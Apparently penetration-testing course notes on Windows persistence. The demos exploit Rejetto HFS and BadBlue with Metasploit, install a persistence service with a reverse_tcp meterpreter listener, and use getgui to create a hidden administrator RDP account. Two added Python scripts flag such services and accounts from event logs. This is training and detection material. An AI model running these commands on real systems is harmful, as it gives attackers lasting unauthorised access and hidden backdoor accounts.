
Windows Persistence


Last updated 8 months ago

Persistence Via Services

Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code. - MITRE ATT&CK

Gaining an initial foothold is not enough; you need to set up and maintain persistent access to the targets.

Note: The persistence technique you use must comply with the rules of engagement established and agreed with the client.

Demo: Persistence Via Services

nmap -sV 10.2.31.23
msf6 > search rejetto
msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.2.31.23
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit

# Once we have access to the system, we can set up persistence
# Persistence with Metasploit
msf6 exploit(windows/http/rejetto_hfs_exec) > search persistence_service
msf6 exploit(windows/http/rejetto_hfs_exec) > use 0

msf6 exploit(windows/local/persistence_service) > set LPORT 4433
msf6 exploit(windows/local/persistence_service) > sessions
msf6 exploit(windows/local/persistence_service) > set SESSION 1
msf6 exploit(windows/local/persistence_service) > exploit
# Review the output to see the service being created for persistence
# Also review the Cleanup Meterpreter RC File
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

# Configure the listener
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST eth1
msf6 exploit(multi/handler) > set LPORT 4433
msf6 exploit(multi/handler) > exploit
# Exit the meterpreter session
msf6 exploit(multi/handler) > run
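
A defender-side view of the demo above, as an added example that is not part of the original notes: a service created for persistence is recorded as Service Control Manager event 7045, and this sketch flags auto-start SYSTEM services whose binary sits outside the Windows and Program Files directories. The sample records are constructed, and the trusted-directory heuristic is an assumption rather than documented module behaviour.

```python
import ntpath
import re

# Constructed 7045 records (System log, Service Control Manager); not real logs.
EVENTS_7045 = [
    {"ServiceName": "Spooler", "ImagePath": r"%SystemRoot%\System32\spoolsv.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "UpdaterSvc", "ImagePath": r'"C:\Program Files\Vendor App\updater.exe" --service',
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "kQzRwtP", "ImagePath": r"C:\Users\admin\AppData\Local\Temp\XbLmQ.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "helper", "ImagePath": r"C:\ProgramData\h.exe -k run",
     "StartType": "demand start", "AccountName": r"NT AUTHORITY\LocalService"},
]

# Assumption: binaries under these directories are treated as expected.
TRUSTED_PREFIXES = tuple(p + "\\" for p in (
    r"c:\windows", r"c:\program files", r"c:\program files (x86)"))

def image_executable(image_path, system_root=r"C:\Windows"):
    """Extract the normalised, lower-cased executable path from an ImagePath."""
    p = image_path.strip()
    if p.startswith('"'):                      # quoted path, arguments follow
        p = p[1:].split('"', 1)[0]
    else:                                      # unquoted: cut at first .exe/.dll/.sys
        m = re.match(r"(.+?\.(?:exe|dll|sys))(?:\s|$)", p, re.I)
        p = m.group(1) if m else p.split(" ", 1)[0]
    # Expand the two SystemRoot spellings the SCM accepts.
    p = re.sub(r"^(%systemroot%|\\systemroot)", lambda _: system_root, p, flags=re.I)
    return ntpath.normpath(p).lower()          # also collapses ..\ segments

def suspicious_services(events):
    """Auto-start services running as SYSTEM from outside trusted directories."""
    flagged = []
    for ev in events:
        exe = image_executable(ev["ImagePath"])
        starts_at_boot = ev["StartType"].lower() in ("auto start", "boot start", "system start")
        as_system = ev["AccountName"].lower() in ("localsystem", r"nt authority\system")
        if starts_at_boot and as_system and not exe.startswith(TRUSTED_PREFIXES):
            flagged.append((ev["ServiceName"], exe))
    return flagged

if __name__ == "__main__":
    for name, exe in suspicious_services(EVENTS_7045):
        print(f"review service {name}: {exe}")
```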

Quiz: Persistence Via Services

Persistence Via RDP

Demo: Persistence Via RDP

nmap -sV 10.2.18.93
searchsploit BadBlue
msf6 > search BadBlue
msf6 > use 1
msf6 exploit(windows/http/badblue_passthru) > set RHOSTS 10.2.18.93
msf6 exploit(windows/http/badblue_passthru) > show options
msf6 exploit(windows/http/badblue_passthru) > exploit
meterpreter > getuid
meterpreter > sysinfo
meterpreter > pgrep explorer
meterpreter > migrate 4072
meterpreter > sysinfo
# RDP persistence
# Create a user and enable RDP (getgui)
# adds the user to the Remote Desktop Users and local Administrators groups
# hides the user from the logon screen
meterpreter > run getgui -e -u alexis -p hacker_123321
        Setting user account for logon
        Adding User: alexis with Password: hacker_123321
        Hiding user from Windows Login screen
        Adding User: alexis to local group 'Remote Desktop Users'
        Adding User: alexis to local group 'Administrators'

# Use an RDP client to connect
root@attackdefense:~# xfreerdp /u:alexis /p:hacker_123321 /v:10.2.18.93
# cmd
whoami /priv
net user
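
The getgui output above is a sequence a defender can correlate: account created, hidden from the logon screen, then added to 'Remote Desktop Users' and 'Administrators'. The following is an added example, not part of the original notes, that matches that sequence over constructed records; it assumes events are already normalised with a resolved username (Security 4720 and 4732, Sysmon 13 for the `SpecialAccounts\UserList` registry value), and the field names are hypothetical.

```python
from datetime import datetime, timedelta

# Registry key whose values (set to 0) hide accounts from the logon screen.
UL = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList"

# Constructed, pre-normalised records (not real logs); field names are assumptions.
EVENTS = [
    {"ts": "2024-05-01T10:00:03", "id": 4720, "user": "alexis"},
    {"ts": "2024-05-01T10:00:04", "id": 13, "key": UL + r"\alexis", "value": 0},
    {"ts": "2024-05-01T10:00:05", "id": 4732, "user": "alexis", "group": "Remote Desktop Users"},
    {"ts": "2024-05-01T10:00:06", "id": 4732, "user": "alexis", "group": "Administrators"},
    {"ts": "2024-05-02T09:00:00", "id": 4720, "user": "svc_backup"},
    {"ts": "2024-05-02T15:30:00", "id": 4732, "user": "svc_backup", "group": "Administrators"},
]
WATCHED_GROUPS = {"administrators", "remote desktop users"}

def classify(ev):
    """Map one event to (username, signal), or None if it is not relevant."""
    if ev["id"] == 4720:                                   # local account created
        return ev["user"].lower(), "created"
    if ev["id"] == 4732 and ev["group"].lower() in WATCHED_GROUPS:
        return ev["user"].lower(), "group:" + ev["group"].lower()
    prefix = UL.lower() + "\\"
    if ev["id"] == 13 and ev["key"].lower().startswith(prefix) and ev["value"] == 0:
        return ev["key"].lower()[len(prefix):], "hidden"   # value name is the account
    return None

def find_backdoor_accounts(events, window=timedelta(minutes=5), min_extra=2):
    """Accounts whose creation is followed, inside `window`, by at least
    `min_extra` of: Administrators add, RDP group add, logon-screen hiding."""
    created, hits = {}, {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        result = classify(ev)
        if result is None:
            continue
        user, signal = result
        ts = datetime.fromisoformat(ev["ts"])
        if signal == "created":
            created[user], hits[user] = ts, set()
        elif user in created and ts - created[user] <= window:
            hits[user].add(signal)
    return {u: sorted(s) for u, s in hits.items() if len(s) >= min_extra}

if __name__ == "__main__":
    for user, signals in find_backdoor_accounts(EVENTS).items():
        print(f"review account {user}: {', '.join(signals)}")
```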

Quiz: Persistence Via RDP

Persistence, Tactic TA0003 - Enterprise | MITRE ATT&CK®